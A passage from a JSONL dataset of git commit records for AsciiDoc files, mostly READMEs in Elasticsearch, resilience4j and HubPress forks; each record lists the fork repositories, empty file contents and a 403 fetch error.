#13886\n","repos":"nezirus\/elasticsearch,cwurm\/elasticsearch,nknize\/elasticsearch,artnowo\/elasticsearch,avikurapati\/elasticsearch,qwerty4030\/elasticsearch,mmaracic\/elasticsearch,girirajsharma\/elasticsearch,Collaborne\/elasticsearch,clintongormley\/elasticsearch,xuzha\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,jchampion\/elasticsearch,fernandozhu\/elasticsearch,kalimatas\/elasticsearch,gmarz\/elasticsearch,markharwood\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,wbowling\/elasticsearch,a2lin\/elasticsearch,Collaborne\/elasticsearch,scottsom\/elasticsearch,henakamaMSFT\/elasticsearch,kaneshin\/elasticsearch,mapr\/elasticsearch,episerver\/elasticsearch,polyfractal\/elasticsearch,nomoa\/elasticsearch,andrestc\/elasticsearch,strapdata\/elassandra5-rc,sreeramjayan\/elasticsearch,LeoYao\/elasticsearch,clintongormley\/elasticsearch,andrejserafim\/elasticsearch,rlugojr\/elasticsearch,ESamir\/elasticsearch,gmarz\/elasticsearch,HonzaKral\/elasticsearch,andrejserafim\/elasticsearch,jbertouch\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,myelin\/elasticsearch,JackyMai\/elasticsearch,clintongormley\/elasticsearch,snikch\/elasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,StefanGor\/elasticsearch,fred84\/elasticsearch,AndreKR\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,ESamir\/elasticsearch,jbertouch\/elasticsearch,shreejay\/elasticsearch,a2lin\/elasticsearch,LewayneNaidoo\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,fforbeck\/elasticsearch,ESamir\/elasticsearch,winstonewert\/elasticsearch,sdauletau\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,jchampion\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gmarz\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,tebriel\/elasticsearch,henakamaMSFT\/elasticsearch,mapr\/elasticsearch,nazarewk\/elasticsearch,strapdata\/elassandra,schonfeld\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,trangvh\/elasticsearch,MaineC\/elasticsearch,i-am-Nathan\/elasticsearch,rajanm\/elasticsearch,drewr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,LewayneNaidoo\/elasticsearch,spiegela\/elasticsearch,IanvsPoplicola\/elasticsearch,tebriel\/elasticsearch,geidies\/elasticsearch,nezirus\/elasticsearch,schonfeld\/elasticsearch,LeoYao\/elasticsearch,xuzha\/elasticsearch,pozhidaevak\/elasticsearch,PhaedrusTheGreek\/elasticsearch,palecur\/elasticsearch,spiegela\/elasticsearch,wuranbo\/elasticsearch,masaruh\/elasticsearch,ricardocerq\/elasticsearch,dongjoon-hyun\/elasticsearch,mohit\/elasticsearch,davidvgalbraith\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,liweinan0423\/elasticsearch,HonzaKral\/elasticsearch,obourgain\/elasticsearch,F0lha\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,F0lha\/elasticsearch,spiegela\/elasticsearch,obourgain\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,rhoml\/elasticsearch,PhaedrusTheGreek\/elasticsearch,shreejay\/elasticsearch,elasticdog\/elasticsearch,glefloch\/elasticsearch,ricardocerq\/elasticsearch,rhoml\/elasticsearch,JackyMai\/elasticsearch,diendt\/elasticsearch,schonfeld\/elasticsearch,jeteve\/elasticsearch,episerver\/elasticsearch,Shepard1212\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wangtuo\/elasticsearch,mapr\/elasticsearch,awislowski\/elasticsearch,LeoYao\/elasticsearch,cwurm\/elasticsearch,vroyer\/elasticassandra,i-am-Nathan\/elasticsearch,yynil\/elasticsearch,glefloch\/elasticsearch,clintongormley\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,martinstuga\/elasticsearch,henakamaMSFT\/elasticsearch,xuzha\/elasticsearch,fernandozhu\/elasticsearch,StefanGor\/elasticsearch,GlenRSmith\/elasticsearch,zkidkid\/elasticsearch,diendt\/elasticsearch,liweinan0423\/elasticsearch,Shepard1212\/elasticsearch,tebriel\/elasticsearch,mmaracic\/elasticsearch,markwalkom\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,girirajsharma\/elasticsearch,C-Bish\/elasticsearch,nilabhsagar\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sneivandt\/elasticsearch,C-Bish\/elasticsearch,elasticdog\/elasticsearch,wenpos\/elasticsearch,sreeramjayan\/elasticsearch,wbowling\/elasticsearch,avikurapati\/elasticsearch,mohit\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sneivandt\/elasticsearch,sdauletau\/elasticsearch,elasticdog\/elasticsearch,zkidkid\/elasticsearch,trangvh\/elasticsearch,andrestc\/elasticsearch,jimczi\/elasticsearch,ricardocerq\/elasticsearch,jchampion\/elasticsearch,robin13\/elasticsearch,myelin\/elasticsearch,geidies\/elasticsearch,infusionsoft\/elasticsearch,rmuir\/elasticsearch,MaineC\/elasticsearch,scorpionvicky\/elasticsearch,sreeramjayan\/elasticsearch,LeoYao\/elasticsearch,ivansun1010\/elasticsearch,njlawton\/elasticsearch,robin13\/elasticsearch,snikch\/elasticsearch,iacdingping\/elasticsearch,jimczi\/elasticsearch,JervyShi\/elasticsearch,infusionsoft\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,sdauletau\/elasticsearch,maddin2016\/elasticsearch,ivansun1010\/elasticsearch,JervyShi\/elasticsearch,jbertouch\/elasticsearch,jeteve\/elasticsearch,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,jpountz\/elasticsearch,njlawton\/elasticsearch,davidvgalbraith\/elasticsearch,davidvgalbraith\/elasticsearch,davidvgalbraith\/elasticsearch,tebriel\/elasticsearch,jpountz\/elasticsearch,jchampion\/elasticsearch,andrestc\/elasticsearch,awislowski\/elasticsearch,gmarz\/elasticsearch,rmuir\/elasticsearch,jeteve\/elasticsearch,diendt\/elasticsearch,Collaborne\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wbowling\/elasticsearch,alexshadow007\/elasticsearch,umeshdangat\/elasticsearch,xuzha\/elasticsearch,nazarewk\/elasticsearch,ricardocerq\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,martinstuga\/elasticsearch,strapdata\/elassandra,jprante\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,AndreKR\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,sreeramjayan\/elasticsearch,qwerty4030\/elasticsearch,drewr\/elasticsearch,martinstuga\/elasticsearch,davidvgalbraith\/elasticsearch,jpountz\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,dongjoon-hyun\/elasticsearch,JSCooke\/elasticsearch,rlugojr\/elasticsearch,F0lha\/elasticsearch,schonfeld\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,nknize\/elasticsearch,JervyShi\/elasticsearch,henakamaMSFT\/elasticsearch,cwurm\/elasticsearch,JackyMai\/elasticsearch,iacdingping\/elasticsearch,gingerwizard\/elasticsearch,andrestc\/elasticsearch,episerver\/elasticsearch,strapdata\/elassandra5-rc,njlawton\/elasticsearch,StefanGor\/elasticsearch,lks21c\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,uschindler\/elasticsearch,nomoa\/elasticsearch,scottsom\/elasticsearch,AndreKR\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,ivansun1010\/elasticsearch,strapdata\/elassandra5-rc,vroyer\/elassandra,liweinan0423\/elasticsearch,gingerwizard\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,sdauletau\/elasticsearch,IanvsPoplicola\/elasticsearch,camilojd\/elasticsearch,JervyShi\/elasticsearch,infusionsoft\/elasticsearch,umeshdangat\/elasticsearch,wbowling\/elasticsearch,ZTE-PaaS\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,yynil\/elasticsearch,snikch\/elasticsearch,fred84\/elasticsearch,myelin\/elasticsearch,njlawton\/elasticsearch,artnowo\/elasticsearch,strapdata\/elassandra,fforbeck\/elasticsearch,uschindler\/elasticsearch,mmaracic\/elasticsearch,drewr\/elasticsearch,rlugojr\/elasticsearch,alexshadow007\/elasticsearch,jbertouch\/elasticsearch,rajanm\/elasticsearch,palecur\/elasticsearch,mortonsykes\/elasticsearch,F0lha\/elasticsearch,i-am-Nathan\/elasticsearch,wbowling\/elasticsearch,kaneshin\/elasticsearch,camilojd\/elasticsearch,LewayneNaidoo\/elasticsearch,nazarewk\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,rhoml\/elasticsearch,bawse\/elasticsearch,ricardocerq\/elasticsearch,gfyoung\/elasticsearch,rmuir\/elasticsearch,xuzha\/elasticsearch,henakamaMSFT\/elasticsearch,drewr\/elasticsearch,mmaracic\/elasticsearch,njlawton\/elasticsearch,scorpionvicky\/elasticsearch,jpountz\/elasticsearch,fforbeck\/elasticsearch,lks21c\/elasticsearch,rmuir\/elasticsearch,andrestc\/elasticsearch,JervyShi\/elasticsearch,brandonkearby\/elasticsearch,fforbeck\/elasticsearch,kaneshin\/elasticsearch,girirajsharma\/elasticsearch,mmaracic\/elasticsearch,trangvh\/elasticsearch,martinstuga\/elasticsearch,StefanGor\/elasticsearch,camilojd\/elasticsearch,dpursehouse\/elasticsearch,mapr\/elasticsearch,avikurapati\/elasticsearch,masaruh\/elasticsearch,rhoml\/elasticsearch,kalimatas\/elasticsearch,nilabhsagar\/elasticsearch,wangtuo\/elasticsearch,Collaborne\/elasticsearch,Helen-Zhao\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,markharwood\/elasticsearch,polyfractal\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,infusionsoft\/elasticsearch,liweinan0423\/elasticsearch,Collaborne\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,ivansun1010\/elasticsearch,sdauletau\/elasticsearch,polyfractal\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,jchampion\/elasticsearch,GlenRSmith\/elasticsearch,glefloch\/elasticsearch,andrejserafim\/elasticsearch,GlenRSmith\/elasticsearch,infusionsoft\/elasticsearch,trangvh\/elasticsearch,diendt\/elasticsearch,kalimatas\/elasticsearch,drewr\/elasticsearch,yynil\/elasticsearch,jchampion\/elasticsearch,glefloch\/elasticsearch,fforbeck\/elasticsearch,snikch\/elasticsearch,qwerty4030\/elasticsearch,artnowo\/elasticsearch,Helen-Zhao\/elasticsearch,sneivandt\/elasticsearch,awislowski\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,C-Bish\/elasticsearch,i-am-Nathan\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,vroyer\/elassandra,i-am-Nathan\/elasticsearch,mortonsykes\/elasticsearch,nilabhsagar\/elasticsearch,wuranbo\/elasticsearch,polyfractal\/elasticsearch,brandonkearby\/elasticsearch,camilojd\/elasticsearch,jprante\/elasticsearch,s1monw\/elasticsearch,MaineC\/elasticsearch,naveenhooda2000\/elasticsearch,jbertouch\/elasticsearch,dpursehouse\/elasticsearch,nomoa\/elasticsearch,iacdingping\/elasticsearch,snikch\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,shreejay\/elasticsearch,umeshdangat\/elasticsearch,markharwood\/elasticsearch,girirajsharma\/elasticsearch,girirajsharma\/elasticsearch,MisterAndersen\/elasticsearch,yynil\/elasticsearch,mmaracic\/elasticsearch,iacdingping\/elasticsearch,s1monw\/elasticsearch,Stacey-Gammon\/elasticsearch,StefanGor\/elasticsearch,clintongormley\/elasticsearch,awislowski\/elasticsearch,martinstuga\/elasticsearch,iacdingping\/elasticsearch,naveenhooda2000\/elasticsearch,bawse\/elasticsearch,nilabhsagar\/elasticsearch,sdauletau\/elasticsearch,strapdata\/elassandra5-rc,vroyer\/elassandra,dpursehouse\/elasticsearch,cwurm\/elasticsearch,iacdingping\/elasticsearch,wenpos\/elasticsearch,palecur\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,yanjunh\/elasticsearch,spiegela\/elasticsearch,gmarz\/elasticsearch,diendt\/elasticsearch,andrestc\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,obourgain\/elasticsearch,liweinan0423\/elasticsearch,sdauletau\/elasticsearch,JSCooke\/elasticsearch,dongjoon-hyun\/elasticsearch,andrestc\/elasticsearch,scorpionvicky\/elasticsearch,markharwood\/elasticsearch,sreeramjayan\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,s1monw\/elasticsearch,socialrank\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,xuzha\/elasticsearch,episerver\/elasticsearch,davidvgalbraith\/elasticsearch,kaneshin\/elasticsearch,tebriel\/elasticsearch,schonfeld\/elasticsearch,C-Bish\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,wbowling\/elasticsearch,ESamir\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,HonzaKral\/elasticsearch,ZTE-PaaS\/elasticsearch,mjason3\/elasticsearch,nomoa\/elasticsearch,cwurm\/elasticsearch,naveenhooda2000\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,nomoa\/elasticsearch,jeteve\/elasticsearch,dpursehouse\/elasticsearch,drewr\/elasticsearch,ESamir\/elasticsearch,mohit\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,dongjoon-hyun\/elasticsearch,myelin\/elasticsearch,andrejserafim\/elasticsearch,F0lha\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,camilojd\/elasticsearch,strapdata\/elassandra5-rc,ivansun1010\/elasticsearch,wuranbo\/elasticsearch,polyfractal\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,zkidkid\/elasticsearch,trangvh\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,kaneshin\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,andrejserafim\/elasticsearch,andrejserafim\/elasticsearch,ZTE-PaaS\/elasticsearch,AndreKR\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mortonsykes\/elasticsearch,socialrank\/elasticsearch,mikemccand\/elasticsearch,schonfeld\/elasticsearch,mikemccand\/elasticsearch,socialrank\/elasticsearch,nezirus\/elasticsearch,jbertouch\/elasticsearch,MisterAndersen\/elasticsearch,shreejay\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,mapr\/elasticsearch,Shepard1212\/elasticsearch,mapr\/elasticsearch,jimczi\/elasticsearch,dpursehouse\/elasticsearch,AndreKR\/elasticsearch,sreeramjayan\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,ESamir\/elasticsearch,iacdingping\/elasticsearch,glefloch\/elasticsearch,avikurapati\/elasticsearch,wbowling\/elasticsearch,LewayneNaidoo\/elasticsearch,kaneshin\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,uschindler\/elasticsearch,mikemccand\/elasticsearch,rhoml\/elasticsearch,mohit\/elasticsearch,infusionsoft\/elasticsearch,schonfeld\/elasticsearch,dongjoon-hyun\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,naveenhooda2000\/elasticsearch,zkidkid\/elasticsearch,rmuir\/elasticsearch,martinstuga\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,obourgain\/elasticsearch,snikch\/elasticsearch,jprante\/elasticsearch,socialrank\/elasticsearch,shreejay\/elasticsearch,jpountz\/elasticsearch,awislowski\/elasticsearch,jpountz\/elasticsearch,brandonkearby\/elasticsearch,kalimatas\/elasticsearch,zkidkid\/elasticsearch,jeteve\/elasticsearch,yynil\/elasticsearch,jeteve\/elasticsearch,drewr\/elasticsearch,camilojd\/elasticsearch,socialrank\/elasticsearch,polyfractal\/elasticsearch,gfyoung\/elasticsearch,jeteve\/elasticsearch,maddin2016\/elasticsearch,rmuir\/elasticsearch,obourgain\/elasticsearch,ivansun1010\/elasticsearch,rlugojr\/elasticsearch,clintongormley\/elasticsearch,girirajsharma\/elasticsearch,Collaborne\/elasticsearch,markharwood\/elasticsearch,socialrank\/elasticsearch,F0lha\/elasticsearch,MaineC\/elasticsearch,AndreKR\/elasticsearch,fernandozhu\/elasticsearch,yanjunh\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,markharwood\/elasticsearch,avikurapati\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,JackyMai\/elasticsearch,infusionsoft\/elasticsearch,MaineC\/elasticsearch,robin13\/elasticsearch,socialrank\/elasticsearch,markwalkom\/elasticsearch,rhoml\/elasticsearch,palecur\/elasticsearch,naveenhooda2000\/elasticsearch,JervyShi\/elasticsearch,PhaedrusTheGreek\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,tebriel\/elasticsearch,episerver\/elasticsearch,jprante\/elasticsearch,masaruh\/elasticsearch,yynil\/elasticsearch,diendt\/elasticsearch,fernandozhu\/elasticsearch,wuranbo\/elasticsearch,Helen-Zhao\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,strapdata\/elassandra,myelin\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/datehistogram-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/datehistogram-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bde813385ba504daf47087289efa63d69cea06df","subject":"to DOM","message":"to DOM\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12c8cdb6f2c28206dcaa3614caa99712d5fcfa88","subject":"Create README.adoc","message":"Create README.adoc","repos":"jessbringlarsen\/jessbringlarsen.github.io,jessbringlarsen\/jessbringlarsen.github.io,jessbringlarsen\/jessbringlarsen.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jessbringlarsen\/jessbringlarsen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e29d22d1465d68124f86661ef0e441f8bf042a","subject":"Added codacy badge","message":"Added codacy badge","repos":"drmaas\/resilience4j,mehtabsinghmann\/resilience4j,goldobin\/resilience4j,resilience4j\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"053f9c8ce4a75ab5778a22009f0c42d786a1d8d0","subject":"Updated documentation","message":"Updated documentation\n","repos":"storozhukBM\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7bd23b4cd65047c0d6be73e39f43b9372cd473cd","subject":"added README","message":"added README\n","repos":"abelsromero\/pdf-box-examples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abelsromero\/pdf-box-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d18e6d2ec81409b610f06861719afb01af55c3c","subject":"docs: Fix broken links","message":"docs: Fix broken links\n\n\r\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ff2300c2bc85f176e9117d70363dff215bc7f21","subject":"initial import","message":"initial import\n","repos":"Mogztter\/asciidoctor.js,Mogztter\/asciidoctor.js,rahmanusta\/asciidoctor.js,nawroth\/asciidoctor.js,anthonny\/asciidoctor.js,Mogztter\/asciidoctor.js,asciidocfx\/asciidoctor.js,asciidoctor\/asciidoctor.js,asciidoctor\/asciidoctor.js,anthonny\/asciidoctor.js,mojavelinux\/asciidoctor.js,nawroth\/asciidoctor.js,anthonny\/asciidoctor.js,Mogztter\/asciidoctor.js,asciidocfx\/asciidoctor.js,asciidoctor\/asciidoctor.js,asciidocfx\/asciidoctor.js,rahmanusta\/asciidoctor.js,rahmanusta\/asciidoctor.js,asciidoctor\/asciidoctor.js,asciidoctor\/asciidoctor.js,asciidoctor\/asciidoctor.js,mojavelinux\/asciidoctor.js,asciidocfx\/asciidoctor.js,Mogztter\/asciidoctor.js,anthonny\/asciidoctor.js,rahmanusta\/asciidoctor.js,Mogztter\/asciidoctor.js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d380e4d7793b04da02ff3a3e0c3bebfd550682d4","subject":"Add @jaredmorgs modification, add informations about cover-image, tags and publication date","message":"Add @jaredmorgs modification, add informations about cover-image, tags and publication date\n","repos":"ice09\/ice09ng,fbridault\/sandblog,dan-blanchard\/blog,alexhanschke\/hubpress.io,semarium\/blog,josegomezr\/blog,jamarortiz\/pragmaticalware,agentmilindu\/hubpress.io,julianrichen\/blog,DavidTPate\/davidtpate.com,anandjagadeesh\/blog,brieb\/hubpress.io,mcrotty\/hubpress.io,jjmean2\/server-study,sharmivssharmi\/sharmipress,lauesa\/Blog,chackomathew\/blog,Abdul2\/abdul2.github.io,ciena-blueplanet\/developers.blog,dmacstack\/glob,gscheibel\/blog,sanctumware\/hubpress,rynop\/rynop.hubpress.io,devananda\/devananda.github.io,manelvf\/blog,pdudits\/hubpress,pepite\/hubpress.io,simonturesson\/hubpresstestsimon,OlympusOnline2\/announcements,melix\/hubpress,rrrhys\/blog.codeworkshop.com.au,Port666\/hubpress.io,schweitzer\/hubpress.io,seturne\/hubpress.io,MinxianLi\/hubpress.io,JohanBrunet\/hubpress.io,crobby\/hubpress.io,mgreau\/posts,J0HDev\/blog,ruaqiwei23\/blog,pascalgrimaud\/hubpress.io,entropyz\/blog,celsogg\/blog,isaacriquelme\/endata.do,ottoandry\/ottoandry1,AirHacX\/blog.airhacx.com,btsibr\/myhubpress,DimShadoWWW\/blog,kornel661\/blog-test-jm,christofmarti\/blog,lauesa\/Blog,crobby\/hubpress.io,flug\/flug.github.io,Abdul2\/abdul2.github.io,marksubbarao\/hubpress.io,artavels\/pages,gbougeard\/blog.english,dsuryakusuma\/dsuryakusuma.github.io,jiashengc\/blog,fghhfg\/hubpress.io,demiansan\/demiansan.github.io,arabindamoni\/hubpress.io,envyen\/blog,hutchr\/hutchr.github.io,itsmyr4bbit\/blog,yhikishima\/hubpress,adest\/press,amberry\/blog,codetricity\/journey,christofmarti\/blog,woehrl01\/woehrl01.hubpress.io,elinep\/blog,cmhgroupllc\/blog,joshuarrrr\/hubpress.io,errorval\/blog,simpleHoChun\/blog,tedbergeron\/hubpress.io,celsogg\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,bemug\/devblog,mairandomness\/randomblog,qingyuqy\/qingyuqy.io,gsha0\/hubpress.io,jiashengc\/blog,gogonkt\/makenothing,jpcanovas\/myBlog,Nepal-Blockchain\/danphe-blogs,moonPress\/press.io,vuthaihoc\/vuthaihoc.github.io,thesagarsutar\/hubpress,henryouly\/henryouly.github.io,discimport\/blog.discimport.dk,princeminz\/blog,palaxi00\/palaxi00.github.io,lrabiet\/patisserie,rorosaurus\/hubpress.io,pej\/hubpress.io,ucide-coruptia\/ucide-coruptia.ro,cmhgroupllc\/blog,discimport\/blog.discimport.dk,jlmcgehee21\/nooganeer,dan-blanchard\/blog,elinep\/blog,jimmidyson\/testblog,Perthmastersswimming\/hubpress.io,juhuntenburg\/gsoc2017,bemug\/devblog,fghhfg\/hubpress.io,joshuarrrr\/hubpress.io,qingyuqy\/qingyuqy.io,mkent-at-rivermeadow-dot-com\/hubpress.io,andreassiegelrfid\/hubpress.io,Red5\/red5.github.io,wzzrd\/hubpress.io,fwalloe\/infosecbriefly,philippevidal80\/blog,roelvs\/hubpress.io,jamarortiz\/pragmaticalware,setupminimal\/blog,hinaloe\/hubpress,topicusonderwijs\/topicusonderwijs.github.io,ice09\/ice09ng,abesn\/hubpress.io,Perthmastersswimming\/hubpress.io,aql\/hubpress.io,JiajiaGuo\/jiajiaguo.github.io,plyom\/hubpress.io,jjmean2\/server-study,rh0\/the-myriad-path,sebprev\/blog,hutchr\/hutchr.github.io,Codearte\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,artavels\/pages,palaxi00\/palaxi00.github.io,Jekin6\/blog,pdudits\/hubpress,jiashengc\/blog,julianrichen\/blog,jjmean2\/server-study,nicolaschaillot\/pechdencouty,iKnowMagic\/hubpress.io,blackGirlsCode\/blog,SnorlaxH\/blog.urusa.me,cmolitor\/blog,jmnarloch\/blog.io,topluluk\/blog,ashalkhakov\/hubpress.io,yhikishima\/hubpress,crotel\/studio,koter84\/blog,kornel661\/blog-test-jm,alexhanschke\/hubpress.io,gbougeard\/blog.english,Cribstone\/humblehacker,benignbala\/hubpress.io,mkc188\/hubpress.io,xinmeng1\/note,nthline\/hubpress.io,SockPastaRock\/hubpress.io,willcrisis\/www.willcrisis.com,julianrichen\/blog,igovsol\/blog,willcrisis\/www.willcrisis.com,Port666\/hubpress.io,jimmidyson\/testblog,SockPastaRock\/hubpress.io,kobusb\/blog,benignbala\/benignbala.hubpress.io,imukulsharma\/imukulsharma.github.io,mcornell\/OFM,flug\/flug.github.io,lauesa\/Blog,anwfr\/blog.anw.fr,paolo215\/blog,ncomet\/asciiblog,RussellSnyder\/hubpress-test,magivfer\/pages,AlexL777\/hubpressblog,J0HDev\/blog,jamarortiz\/pragmaticalware,Adyrhan\/adyrhan.github.io,manelvf\/blog,mgreau\/posts,roelvs\/hubpress.io,xinmeng1\/note,topicusonderwijs\/topicusonderwijs.github.io,leomedia\/blog,wzzrd\/hubpress.io,jlmcgehee21\/nooganeer,booleanbalaji\/hubpress.io,gilangdanu\/blog,crotel\/meditation,timofei7\/onroutenow,timofei7\/onroutenow,filipeuva\/filipeuva.blog,benignbala\/hubpress.io,gilangdanu\/blog,hang-h\/hubpress.io,ambarishpande\/blog,fwalloe\/infosecbriefly,danen-carlson\/blog,henryouly\/henryouly.github.io,adjiebpratama\/press,codelab-lbernard\/blog,benignbala\/benignbala.hubpress.io,victorcouste\/blog,fastretailing\/blog,freekrai\/hubpress,tom-konda\/blog,brendena\/hubpress.io,nicksam112\/nicksam112.github.io,ErJ101\/hbspractise,lichengzhu\/blog,sidorares\/sidorares.github.io,hva314\/blog,seturne\/hubpress.io,aspick\/hubpress.io,xinmeng1\/note,brieb\/hubpress.io,jmnarloch\/blog.io,DaOesten\/hubpress.io,BenBals\/hubpress,hinaloe\/hubpress,alexknowshtml\/thebigmove,devananda\/devananda.github.io,yaks-all-the-way-down\/hubpress.github.io,cmolitor\/blog,nicolaschaillot\/pechdencouty,rubyinhell\/hubpress.io,andreassiegelrfid\/hubpress.io,ucide-coruptia